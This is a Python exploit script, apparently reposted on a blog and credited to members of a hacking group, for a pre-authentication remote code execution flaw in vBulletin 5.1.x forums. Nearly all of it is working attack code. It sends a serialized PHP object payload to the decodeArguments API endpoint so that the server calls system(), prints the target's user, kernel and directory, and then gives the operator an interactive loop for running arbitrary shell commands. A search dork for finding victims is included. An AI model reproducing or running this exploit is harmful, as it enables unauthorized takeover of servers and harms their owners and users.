#Exploit Title: vBulletin 5.1.x - PreAuth Remote Code Execution
#Date: 11-10-2015
#Dork:Powered by: vBulletin, Version 5.1 or make your own ^^
#Requirements: Python 3.4.x or higher, install Requests and parse Module.
#Description: Not the authors of this exploit we just fixed the exploit and coded this script (Mauritania Attacker & Th3Falcon)
import requests, re, sys
import parse as urlparse #BUG Python Module Parse Fixed By Mauritania Attacker (urllib.parse does not work properly)
def banner():
print( '\n' )
print( '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' )
print( ' VBulletin 5.1.x RCE auto Exploiter Priv8 ' )
print( ' GreetZ To All AnonGhost Members ' )
print( ' Coded by Mauritania Attacker & Th3Falcon ' )
print( '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' )
print( '\n' )
def inject( ghost ):
url = ghost + '/ajax/api/hook/decodeArguments?' #Added "?" after each decodeArguments variable By Mauritania Attacker
try:
r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"*db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"*recordset";s:14:"echo Th3Falcon";}', timeout= 50 )
if 'Th3Falcon' in r.text and len( r.text ) < 50:
try:
r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"*db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"*recordset";s:49:"whoami;echo :::;id;echo :::;uname -a;echo :::;pwd";}', timeout= 50 )
print( ' [+] GROUP : ' + r.text.split( ':::' )[0].strip() )
print( ' [+] USER : ' + r.text.split( ':::' )[1].strip() )
print( ' [+] KERNEL : ' + r.text.split( ':::' )[2].strip() )
print( ' [+] DIR : ' + r.text.split( ':::' )[3].strip() )
sys.stdout.flush()
return r.text.split( ':::' )[3].strip();
except:
return ''
else:
return ''
except:
print(' [+] Problem while exploiting..')
return ''
def bash(ghost, command):
url = ghost + '/ajax/api/hook/decodeArguments?' #Added "?" after each decodeArguments variable By Mauritania Attacker
r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"*db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"*recordset";s:' + str(len(command)) + ':"' + command + '";}', timeout= 50 )
print(r.text)
def main():
banner()
site = ''
while site != 'exit':
site = input('Target : ')
if site == 'exit':
break
mad = inject(site)
if mad != '' :
print(' [+] @Connection Successfully established... \n')
userinput = ''
while userinput != 'exit':
userinput = input("AnonGhost@Target :")
if userinput == 'exit':
break
bash(site, userinput)
else:
print(' [+] Website is not Vulnerable :(')
if __name__ == '__main__':
main()
#D0ne
#./Mauritania Attacker
#./Th3Falcon
#GreetZ To All AnonGhost MemberZ
0 comments:
Post a Comment